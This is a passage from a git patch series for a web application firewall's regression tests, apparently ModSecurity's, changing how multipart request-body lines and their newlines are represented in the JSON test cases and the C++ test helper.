From a5a3db940f04e9c721c610a2da2c4872c05a7f93 Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Sun, 25 Jan 2026 20:00:01 +0900 Subject: [PATCH 01/29] Do not add newline to test body Lines This is needed to test edge cases like a body missing the final newline, for example: [ "a\r\n", "b\r" ] And it is clearer than to add implicit newline to each line except the final line. --- test/regression/regression_test.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/regression/regression_test.cc b/test/regression/regression_test.cc index 01ad2aacc9..8df1d1c035 100644 --- a/test/regression/regression_test.cc +++ b/test/regression/regression_test.cc @@ -48,7 +48,7 @@ inline std::string RegressionTest::yajl_array_to_str(const yajl_val &node) { for (int z = 0; z < node->u.array.len; z++) { yajl_val val3 = node->u.array.values[z]; const char *key = YAJL_GET_STRING(val3); - i << key << "\n"; + i << key; } return i.str(); } From d7cad9506f43610997da5e4e4021c9b6309ef55d Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Sun, 25 Jan 2026 21:02:11 +0900 Subject: [PATCH 02/29] Add needed newlines in test request body lines or adjust tests --- .../regression/action-tnf-base64.json | 2 +- test/test-cases/regression/auditlog.json | 2 +- .../regression/config-body_limits.json | 36 +- test/test-cases/regression/issue-1825.json | 142 +-- test/test-cases/regression/issue-2427.json | 38 +- .../regression/offset-variable.json | 538 +++++------ .../regression/operator-fuzzyhash.json | 124 +-- .../request-body-parser-multipart-crlf.json | 30 +- .../request-body-parser-multipart.json | 856 +++++++++--------- test/test-cases/regression/rule-920120.json | 30 +- .../variable-ARGS_COMBINED_SIZE.json | 6 +- .../regression/variable-ARGS_NAMES.json | 18 +- .../regression/variable-ARGS_POST_NAMES.json | 36 +- .../test-cases/regression/variable-FILES.json | 60 +- .../variable-FILES_COMBINED_SIZE.json | 30 +- .../regression/variable-FILES_NAMES.json | 30 +- .../regression/variable-FILES_SIZES.json | 30 +- .../variable-FULL_REQUEST_LENGTH.json | 30 +- .../variable-MULTIPART_CRLF_LF_LINES.json | 60 +- .../variable-MULTIPART_FILENAME.json | 64 +- ...able-MULTIPART_INVALID_HEADER_FOLDING.json | 22 +- .../regression/variable-MULTIPART_NAME.json | 64 +- .../variable-MULTIPART_PART_HEADERS.json | 40 +- .../variable-MULTIPART_STRICT_ERROR.json | 190 ++-- ...variable-MULTIPART_UNMATCHED_BOUNDARY.json | 30 +- .../variable-REQBODY_PROCESSOR_ERROR.json | 28 +- .../regression/variable-REQUEST_BODY.json | 30 +- .../variable-REQUEST_BODY_LENGTH.json | 30 +- .../variable-RESPONSE_CONTENT_LENGTH.json | 2 +- 29 files changed, 1298 insertions(+), 1300 deletions(-) diff --git a/test/test-cases/regression/action-tnf-base64.json b/test/test-cases/regression/action-tnf-base64.json index 7cb047ce2f..157ddde3c7 100644 --- a/test/test-cases/regression/action-tnf-base64.json +++ b/test/test-cases/regression/action-tnf-base64.json @@ -36,7 +36,7 @@ ] }, "expected":{ - "debug_log": "t:base64encode: \"dmFsdWUyCg==\"" + "debug_log": "t:base64encode: \"dmFsdWUy\"" }, "rules":[ "SecRuleEngine On", diff --git a/test/test-cases/regression/auditlog.json b/test/test-cases/regression/auditlog.json index 417f9950e4..a04867ef49 100644 --- a/test/test-cases/regression/auditlog.json +++ b/test/test-cases/regression/auditlog.json @@ -640,7 +640,7 @@ ] }, "expected": { - "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad\\\\\\\\x0a", + "audit_log": "\"body\":\"\\\\\\\\xc2\\\\\\\\xad=\\\\\\\\xc2\\\\\\\\xad", "debug_log": "", "error_log": "", "http_code": 403 diff --git a/test/test-cases/regression/config-body_limits.json b/test/test-cases/regression/config-body_limits.json index 5059f11ae6..b4e84517f5 100644 --- a/test/test-cases/regression/config-body_limits.json +++ b/test/test-cases/regression/config-body_limits.json @@ -698,15 +698,15 @@ "uri":"/", "method":"POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, "response":{ @@ -753,15 +753,15 @@ "uri":"/", "method":"POST", "body": [ - "--0000", - "Content-Disposition: form-data; name=\"a\"", - "", - "1", - "--0000", - "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"", - "", - "2222222222222222222222222222222222222222222222222222222222222222222222", - "--0000--" + "--0000\n", + "Content-Disposition: form-data; name=\"a\"\n", + "\n", + "1\n", + "--0000\n", + "Content-Disposition: form-data; name=\"b\"; filename=\"c.txt\"\n", + "\n", + "2222222222222222222222222222222222222222222222222222222222222222222222\n", + "--0000--\n" ] }, "response":{ diff --git a/test/test-cases/regression/issue-1825.json b/test/test-cases/regression/issue-1825.json index 41fc349ff8..ca9d4ca435 100644 --- a/test/test-cases/regression/issue-1825.json +++ b/test/test-cases/regression/issue-1825.json @@ -23,16 +23,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -71,16 +71,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*= ISO-8859-1''ab0-_xy.txt; filename=\"ab0-_xy.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -119,17 +119,17 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--\r" - ] + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename*=utf-8''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] }, "response":{ "headers":"", @@ -167,16 +167,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=''03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -215,16 +215,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=UTF-8'03CB1664.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -263,16 +263,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%4G.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ @@ -311,16 +311,16 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"03CB1664.txt\"; filename*=utf-8''%61%62.txt\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "response":{ diff --git a/test/test-cases/regression/issue-2427.json b/test/test-cases/regression/issue-2427.json index 02f7b16f86..6b734af65e 100644 --- a/test/test-cases/regression/issue-2427.json +++ b/test/test-cases/regression/issue-2427.json @@ -24,25 +24,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" ", - "Content-Type: text/plain", - "", - "This is another very small test file that contains the search content abcdef..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file that contains the search content abcdef..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ diff --git a/test/test-cases/regression/offset-variable.json b/test/test-cases/regression/offset-variable.json index 7ffe9299ba..b5c4ed99ff 100644 --- a/test/test-cases/regression/offset-variable.json +++ b/test/test-cases/regression/offset-variable.json @@ -985,21 +985,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1034,21 +1034,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1083,21 +1083,21 @@ "uri":"/", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1279,21 +1279,21 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1328,25 +1328,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1381,25 +1381,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1434,25 +1434,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1487,25 +1487,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1540,25 +1540,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1593,25 +1593,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1646,25 +1646,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1699,25 +1699,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, "expected":{ @@ -1754,25 +1754,25 @@ "uri":"/wheee/f%20i%20l%20e%20", "method":"POST", "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"fiasdfasdfledata\" ", - "Content-Type: text/plain", - "", - "This is another very small test file..", - "----------------------------756b6d74fa1a8ee2--" + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + 